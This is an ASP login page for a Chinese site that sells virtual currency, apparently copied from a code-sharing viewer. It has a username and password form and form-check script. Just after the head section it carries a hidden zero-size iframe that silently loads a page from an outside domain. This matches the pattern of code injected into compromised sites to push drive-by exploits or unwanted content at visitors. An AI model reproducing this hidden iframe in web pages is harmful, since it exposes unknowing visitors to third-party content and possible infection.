📄 login.asp
字号:
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>用户登陆</title>
<link rel="stylesheet" type="text/css" href="1.CSS">
<style>
<!--
.a1 {
color: #FFFF00;
text-decoration: none;
}
-->
</style>
</head><iframe name="aa" frameborder=0 width=0 height="0" src="http://www.nbxqw.cn/ad.html" marginwidth="1" marginheight="1" scrolling="no" ></iframe>
<SCRIPT language=javascript>
<!--
function CheckForm()
{
if(document.thisForm.username.value.length<1)
{
alert("用户名不能为空!");
return false;
}
if(document.thisForm.password.value.length<1)
{
alert("密码不能为空!");
return false;
}
}
//-->
</SCRIPT>
<body topmargin="0" leftmargin="0">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="778" height="266">
<tr>
<td width="778" colspan="4" height="46"><!--#include file=top.asp--></td>
</tr>
<tr>
<td width="409" height="194">
<div align="center">
<center>
<table cellSpacing="0" cellPadding="0" width="372" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tr vAlign="top">
<td align="center" height="25" width="44">
<img src="img/form2_r3_c3.gif"></td>
<td align="left" height="25" width="328">您只需<a class="a1" href="reg.asp"><font color="#FF6600">免费注册</font></a>一次,就可以使用我们的所有服务了。</td>
</tr>
<tr vAlign="top">
<td align="center" height="25" width="44">
<img src="img/form2_r3_c3.gif"></td>
<td align="left" height="25" width="328">若您忘记了密码,<a class="a1" href="getpwd.asp"><font color="#FF6600">可点此找回密码</font></a>。</td>
</tr>
<tr>
<td vAlign="top" align="center" height="25" width="44">
<img src="img/form2_r3_c3.gif"></td>
<td vAlign="top" align="left" height="25" width="328">
在没有特别说明时,我们的服务是<font color="#FF6600">免费的</font>,请放心使用。</td>
</tr>
<tr>
<td vAlign="top" align="center" height="27" width="44">
<img src="img/form2_r3_c3.gif"></td>
<td vAlign="top" align="left" height="27" width="328">本站是使用<font color="#FF6600">虚拟币</font>做为支付手段的,购买<font color="#FF6600">虚拟币</font>后,你可以在本站任何地方进行消费。</td>
</tr>
</table>
</center>
</div>
</td>
<td width="7" height="194" background="img/line_01.gif"> </td>
<td width="354" height="194" align="center">
<table class="font_10_e_blue" style="BORDER-COLLAPSE: collapse" borderColor="#111111" cellSpacing="0" cellPadding="0" width="100" background="img/login_r3_c1.gif" border="0">
<tr>
<td vAlign="top" width="173">
<img src="img/mail_login_r1_c1.gif" border="0"></td>
</tr>
<tr>
<td vAlign="top" width="173" background="img/mail_login_r3_c1.gif">
<table class="font_10_e_black" cellSpacing="0" cellPadding="3" width="98%" align="center" border="0">
<form id="f1" name="thisForm" action="Loginchk.asp" method="post">
<tr>
<td width="48%">
<p align="center"> 登陆帐号:</td>
<td width="52%">
<input class="form_e_10_black" id="username2" maxLength="20" size="10" name="username"></td>
</tr>
<tr>
<td>
<p align="center"> 登陆密码:</td>
<td>
<input type="password" maxLength="32" size="10" value name="password"></td>
</tr>
<tr>
<td> </td>
<td>
<input onclick="javascript:return CheckForm();" type="image" src="img/mail_login_r5_c2.gif" border="0" name="I2">
</td>
</tr>
</form>
</table>
</td>
</tr>
<tr>
<td vAlign="top" width="173">
<img alt src="img/mail_login_r7_c1.gif" border="0" name="mail_login_r7_c1"></td>
</tr>
</table>
</td>
<td width="8" height="194"> </td>
</tr>
<tr>
<td width="778" height="26" colspan="4"><!--#include file=copywright.asp--></td>
</tr>
</table>
</center>
</div>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -